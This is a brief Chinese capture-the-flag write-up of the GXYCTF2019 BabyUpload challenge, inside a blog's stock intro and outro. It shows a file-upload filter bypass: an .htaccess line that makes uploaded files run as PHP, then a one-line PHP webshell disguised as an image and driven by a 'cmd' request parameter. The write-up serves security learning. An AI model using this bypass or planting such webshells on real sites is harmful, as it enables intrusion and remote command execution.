本文主要是介绍[GXYCTF2019]BabyUpload 1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
知识点:.htaccess 一句话马
目录
它过滤了ph后缀,不论大小写,还过滤了内容以<?开头的文件。
我们可以先传个.htaccess,把后面我们传上去的解析为php。
SetHandler application/x-httpd-php
上传图片
<script language='php'>assert($_REQUEST['cmd'])</script>
最后进入图片的上传目录webshell,拿flag
这篇关于[GXYCTF2019]BabyUpload 1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!